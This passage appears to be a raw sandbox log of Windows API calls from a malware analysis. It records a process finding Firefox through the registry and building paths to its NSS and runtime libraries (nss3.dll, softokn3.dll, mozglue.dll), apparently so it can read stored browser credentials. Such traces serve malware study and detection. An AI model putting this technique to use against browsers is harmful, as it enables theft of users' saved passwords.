lpString1=".dll") returned=".dll" [0204.879] lstrlenW (lpString=".dll") returned 4 [0204.879] lstrlenW (lpString="\\msvcr120") returned 9 [0204.879] VirtualQuery (in: lpAddress=0x3120000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x3120000, AllocationBase=0x3120000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.879] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.879] VirtualFree (lpAddress=0x3120000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.880] lstrcatW (in: lpString1="\\msvcr120", lpString2=".dll" | out: lpString1="\\msvcr120.dll") returned="\\msvcr120.dll" [0204.880] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.880] PathFileExistsW (pszPath="\\msvcr120.dll") returned 0 [0204.880] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.881] lstrlenW (lpString="\\msvcr") returned 6 [0204.881] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.881] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\msvcr" | out: lpString1="\\msvcr") returned="\\msvcr" [0204.881] wsprintfW (in: param_1=0x415f164, param_2="%d" | out: param_1="130") returned 3 [0204.881] lstrlenW (lpString="130") returned 3 [0204.881] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.882] lstrlenW (lpString="130") returned 3 [0204.882] lstrcpyW (in: lpString1=0x2e20000, lpString2="130" | out: lpString1="130") returned="130" [0204.882] lstrlenW (lpString="130") returned 3 [0204.882] lstrlenW (lpString="\\msvcr") returned 6 [0204.882] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f10c, dwLength=0x1c | out: lpBuffer=0x415f10c*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.882] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3120000 [0204.882] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.882] lstrcatW (in: lpString1="\\msvcr", lpString2="130" | out: lpString1="\\msvcr130") returned="\\msvcr130" [0204.882] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.883] lstrlenW (lpString=".dll") returned 4 [0204.883] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.883] lstrlenW (lpString=".dll") returned 4 [0204.883] lstrcpyW (in: lpString1=0x2df0000, lpString2=".dll" | out: lpString1=".dll") returned=".dll" [0204.883] lstrlenW (lpString=".dll") returned 4 [0204.883] lstrlenW (lpString="\\msvcr130") returned 9 [0204.883] VirtualQuery (in: lpAddress=0x3120000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x3120000, AllocationBase=0x3120000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.883] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.883] VirtualFree (lpAddress=0x3120000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.884] lstrcatW (in: lpString1="\\msvcr130", lpString2=".dll" | out: lpString1="\\msvcr130.dll") returned="\\msvcr130.dll" [0204.884] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.884] PathFileExistsW (pszPath="\\msvcr130.dll") returned 0 [0204.884] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.884] lstrlenW (lpString="\\msvcr") returned 6 [0204.884] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.885] lstrcpyW (in: lpString1=0x2df0000, lpString2="\\msvcr" | out: lpString1="\\msvcr") returned="\\msvcr" [0204.885] wsprintfW (in: param_1=0x415f164, param_2="%d" | out: param_1="140") returned 3 [0204.885] lstrlenW (lpString="140") returned 3 [0204.885] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.885] lstrlenW (lpString="140") returned 3 [0204.885] lstrcpyW (in: lpString1=0x2e20000, lpString2="140" | out: lpString1="140") returned="140" [0204.885] lstrlenW (lpString="140") returned 3 [0204.885] lstrlenW (lpString="\\msvcr") returned 6 [0204.885] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f10c, dwLength=0x1c | out: lpBuffer=0x415f10c*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.885] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3120000 [0204.886] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.886] lstrcatW (in: lpString1="\\msvcr", lpString2="140" | out: lpString1="\\msvcr140") returned="\\msvcr140" [0204.886] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.886] lstrlenW (lpString=".dll") returned 4 [0204.886] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.887] lstrlenW (lpString=".dll") returned 4 [0204.887] lstrcpyW (in: lpString1=0x2df0000, lpString2=".dll" | out: lpString1=".dll") returned=".dll" [0204.887] lstrlenW (lpString=".dll") returned 4 [0204.887] lstrlenW (lpString="\\msvcr140") returned 9 [0204.887] VirtualQuery (in: lpAddress=0x3120000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x3120000, AllocationBase=0x3120000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.887] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.887] VirtualFree (lpAddress=0x3120000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.887] lstrcatW (in: lpString1="\\msvcr140", lpString2=".dll" | out: lpString1="\\msvcr140.dll") returned="\\msvcr140.dll" [0204.887] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.888] PathFileExistsW (pszPath="\\msvcr140.dll") returned 0 [0204.888] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.888] LoadLibraryW (lpLibFileName="\\msvcr120.dll") returned 0x0 [0204.888] LoadLibraryW (lpLibFileName="\\msvcp120.dll") returned 0x0 [0204.889] LoadLibraryW (lpLibFileName="\\mozglue.dll") returned 0x0 [0204.889] LoadLibraryW (lpLibFileName="\\nss3.dll") returned 0x0 [0204.889] LoadLibraryW (lpLibFileName="\\softokn3.dll") returned 0x0 [0204.889] VirtualFree (lpAddress=0x3110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.889] VirtualFree (lpAddress=0x2f80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.890] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.890] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.890] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.891] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.891] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.891] VirtualFree (lpAddress=0x2eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.892] VirtualFree (lpAddress=0x2de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.892] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.892] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.893] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0204.893] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0204.893] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0204.893] lstrlenW (lpString="Profile") returned 7 [0204.893] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0204.894] lstrlenW (lpString="Profile") returned 7 [0204.894] lstrcpyW (in: lpString1=0x2dd0000, lpString2="Profile" | out: lpString1="Profile") returned="Profile" [0204.894] lstrcpyW (in: lpString1=0x415f3a0, lpString2="Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\") returned="Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\" [0204.894] lstrcatW (in: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\", lpString2="firefox.exe" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\firefox.exe") returned="Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\firefox.exe" [0204.894] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\firefox.exe", ulOptions=0x0, samDesired=0x1, phkResult=0x415f5b0 | out: phkResult=0x415f5b0*=0x2b4) returned 0x0 [0204.894] RegQueryValueExW (in: hKey=0x2b4, lpValueName="Path", lpReserved=0x0, lpType=0x415f5a8, lpData=0x415f7d8, lpcbData=0x415f5ac*=0x104 | out: lpType=0x415f5a8*=0x1, lpData="C:\\Program Files (x86)\\Mozilla Firefox", lpcbData=0x415f5ac*=0x4e) returned 0x0 [0204.894] RegCloseKey (hKey=0x2b4) returned 0x0 [0204.894] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox") returned 38 [0204.894] VirtualAlloc (lpAddress=0x0, dwSize=0x4e, flAllocationType=0x3000, flProtect=0x4) returned 0x2de0000 [0204.895] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox") returned 38 [0204.895] lstrcpyW (in: lpString1=0x2de0000, lpString2="C:\\Program Files (x86)\\Mozilla Firefox" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox") returned="C:\\Program Files (x86)\\Mozilla Firefox" [0204.895] lstrcatW (in: lpString1="C:\\Program Files (x86)\\Mozilla Firefox", lpString2="\\firefox.exe" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe") returned="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe" [0204.895] GetBinaryTypeW (in: lpApplicationName="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", lpBinaryType=0x415fa3c | out: lpBinaryType=0x415fa3c) returned 1 [0204.895] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox") returned 38 [0204.895] VirtualAlloc (lpAddress=0x0, dwSize=0x4e, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.896] lstrcpyW (in: lpString1=0x2df0000, lpString2="C:\\Program Files (x86)\\Mozilla Firefox" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox") returned="C:\\Program Files (x86)\\Mozilla Firefox" [0204.896] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x415e780 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0204.896] SetCurrentDirectoryW (lpPathName="C:\\Program Files (x86)\\Mozilla Firefox" (normalized: "c:\\program files (x86)\\mozilla firefox")) returned 1 [0204.896] lstrlenW (lpString="\\") returned 1 [0204.896] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.896] lstrlenW (lpString="\\") returned 1 [0204.897] lstrcpyW (in: lpString1=0x2e20000, lpString2="\\" | out: lpString1="\\") returned="\\" [0204.897] lstrlenW (lpString="\\") returned 1 [0204.897] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox") returned 38 [0204.897] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415e70c, dwLength=0x1c | out: lpBuffer=0x415e70c*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.897] VirtualAlloc (lpAddress=0x0, dwSize=0x52, flAllocationType=0x3000, flProtect=0x4) returned 0x2eb0000 [0204.897] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.897] lstrcatW (in: lpString1="C:\\Program Files (x86)\\Mozilla Firefox", lpString2="\\" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\") returned="C:\\Program Files (x86)\\Mozilla Firefox\\" [0204.897] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.898] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\") returned 39 [0204.898] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.898] lstrcpyW (in: lpString1=0x2df0000, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\") returned="C:\\Program Files (x86)\\Mozilla Firefox\\" [0204.898] lstrlenW (lpString="nss3.dll") returned 8 [0204.898] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.899] lstrlenW (lpString="nss3.dll") returned 8 [0204.899] lstrcpyW (in: lpString1=0x2e20000, lpString2="nss3.dll" | out: lpString1="nss3.dll") returned="nss3.dll" [0204.899] lstrlenW (lpString="nss3.dll") returned 8 [0204.899] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\") returned 39 [0204.899] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415e70c, dwLength=0x1c | out: lpBuffer=0x415e70c*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.899] VirtualAlloc (lpAddress=0x0, dwSize=0x62, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0204.899] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.900] lstrcatW (in: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", lpString2="nss3.dll" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\nss3.dll") returned="C:\\Program Files (x86)\\Mozilla Firefox\\nss3.dll" [0204.900] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.900] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\") returned 39 [0204.900] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.900] lstrcpyW (in: lpString1=0x2df0000, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\") returned="C:\\Program Files (x86)\\Mozilla Firefox\\" [0204.900] lstrlenW (lpString="msvcr120.dll") returned 12 [0204.900] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.901] lstrlenW (lpString="msvcr120.dll") returned 12 [0204.901] lstrcpyW (in: lpString1=0x2e20000, lpString2="msvcr120.dll" | out: lpString1="msvcr120.dll") returned="msvcr120.dll" [0204.901] lstrlenW (lpString="msvcr120.dll") returned 12 [0204.901] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\") returned 39 [0204.901] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415e70c, dwLength=0x1c | out: lpBuffer=0x415e70c*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.901] VirtualAlloc (lpAddress=0x0, dwSize=0x6a, flAllocationType=0x3000, flProtect=0x4) returned 0x2f40000 [0204.901] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.902] lstrcatW (in: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", lpString2="msvcr120.dll" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr120.dll") returned="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr120.dll" [0204.902] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.902] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\") returned 39 [0204.902] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.902] lstrcpyW (in: lpString1=0x2df0000, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\") returned="C:\\Program Files (x86)\\Mozilla Firefox\\" [0204.903] lstrlenW (lpString="msvcp120.dll") returned 12 [0204.903] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.903] lstrlenW (lpString="msvcp120.dll") returned 12 [0204.903] lstrcpyW (in: lpString1=0x2e20000, lpString2="msvcp120.dll" | out: lpString1="msvcp120.dll") returned="msvcp120.dll" [0204.903] lstrlenW (lpString="msvcp120.dll") returned 12 [0204.903] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\") returned 39 [0204.903] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415e70c, dwLength=0x1c | out: lpBuffer=0x415e70c*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.903] VirtualAlloc (lpAddress=0x0, dwSize=0x6a, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0204.904] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.904] lstrcatW (in: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", lpString2="msvcp120.dll" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp120.dll") returned="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp120.dll" [0204.904] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.904] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\") returned 39 [0204.904] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.905] lstrcpyW (in: lpString1=0x2df0000, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\") returned="C:\\Program Files (x86)\\Mozilla Firefox\\" [0204.905] lstrlenW (lpString="mozglue.dll") returned 11 [0204.905] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.905] lstrlenW (lpString="mozglue.dll") returned 11 [0204.905] lstrcpyW (in: lpString1=0x2e20000, lpString2="mozglue.dll" | out: lpString1="mozglue.dll") returned="mozglue.dll" [0204.905] lstrlenW (lpString="mozglue.dll") returned 11 [0204.905] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\") returned 39 [0204.905] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415e70c, dwLength=0x1c | out: lpBuffer=0x415e70c*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.905] VirtualAlloc (lpAddress=0x0, dwSize=0x68, flAllocationType=0x3000, flProtect=0x4) returned 0x2f60000 [0204.906] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.906] lstrcatW (in: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", lpString2="mozglue.dll" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\mozglue.dll") returned="C:\\Program Files (x86)\\Mozilla Firefox\\mozglue.dll" [0204.906] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.907] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\") returned 39 [0204.907] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.907] lstrcpyW (in: lpString1=0x2df0000, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\") returned="C:\\Program Files (x86)\\Mozilla Firefox\\" [0204.907] lstrlenW (lpString="softokn3.dll") returned 12 [0204.907] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.907] lstrlenW (lpString="softokn3.dll") returned 12 [0204.908] lstrcpyW (in: lpString1=0x2e20000, lpString2="softokn3.dll" | out: lpString1="softokn3.dll") returned="softokn3.dll" [0204.908] lstrlenW (lpString="softokn3.dll") returned 12 [0204.908] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\") returned 39 [0204.908] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415e70c, dwLength=0x1c | out: lpBuffer=0x415e70c*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.908] VirtualAlloc (lpAddress=0x0, dwSize=0x6a, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0204.908] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.908] lstrcatW (in: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", lpString2="softokn3.dll" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.dll") returned="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.dll" [0204.908] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.909] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\") returned 39 [0204.909] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.909] lstrcpyW (in: lpString1=0x2df0000, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\") returned="C:\\Program Files (x86)\\Mozilla Firefox\\" [0204.909] lstrlenW (lpString="vcruntime140.dll") returned 16 [0204.909] VirtualAlloc (lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.910] lstrlenW (lpString="vcruntime140.dll") returned 16 [0204.910] lstrcpyW (in: lpString1=0x2e20000, lpString2="vcruntime140.dll" | out: lpString1="vcruntime140.dll") returned="vcruntime140.dll" [0204.910] lstrlenW (lpString="vcruntime140.dll") returned 16 [0204.910] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\") returned 39 [0204.910] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415e70c, dwLength=0x1c | out: lpBuffer=0x415e70c*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.910] VirtualAlloc (lpAddress=0x0, dwSize=0x72, flAllocationType=0x3000, flProtect=0x4) returned 0x2f80000 [0204.910] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.911] lstrcatW (in: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", lpString2="vcruntime140.dll" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\vcruntime140.dll") returned="C:\\Program Files (x86)\\Mozilla Firefox\\vcruntime140.dll" [0204.911] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.911] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\") returned 39 [0204.911] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.911] lstrcpyW (in: lpString1=0x2df0000, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\") returned="C:\\Program Files (x86)\\Mozilla Firefox\\" [0204.911] lstrlenW (lpString="msvcp") returned 5 [0204.911] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.912] lstrlenW (lpString="msvcp") returned 5 [0204.912] lstrcpyW (in: lpString1=0x2e20000, lpString2="msvcp" | out: lpString1="msvcp") returned="msvcp" [0204.912] lstrlenW (lpString="msvcp") returned 5 [0204.912] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\") returned 39 [0204.912] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415e70c, dwLength=0x1c | out: lpBuffer=0x415e70c*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.912] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x3110000 [0204.912] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.913] lstrcatW (in: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", lpString2="msvcp" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp") returned="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp" [0204.913] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.913] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\") returned 39 [0204.913] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.914] lstrcpyW (in: lpString1=0x2df0000, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\") returned="C:\\Program Files (x86)\\Mozilla Firefox\\" [0204.914] lstrlenW (lpString="msvcr") returned 5 [0204.914] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.914] lstrlenW (lpString="msvcr") returned 5 [0204.914] lstrcpyW (in: lpString1=0x2e20000, lpString2="msvcr" | out: lpString1="msvcr") returned="msvcr" [0204.914] lstrlenW (lpString="msvcr") returned 5 [0204.914] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\") returned 39 [0204.914] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415e70c, dwLength=0x1c | out: lpBuffer=0x415e70c*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.914] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x3120000 [0204.915] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.915] lstrcatW (in: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", lpString2="msvcr" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr") returned="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr" [0204.915] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.916] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp") returned 44 [0204.916] VirtualAlloc (lpAddress=0x0, dwSize=0x5a, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.916] lstrcpyW (in: lpString1=0x2df0000, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp") returned="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp" [0204.916] wsprintfW (in: param_1=0x415e558, param_2="%d" | out: param_1="90") returned 2 [0204.916] lstrlenW (lpString="90") returned 2 [0204.916] VirtualAlloc 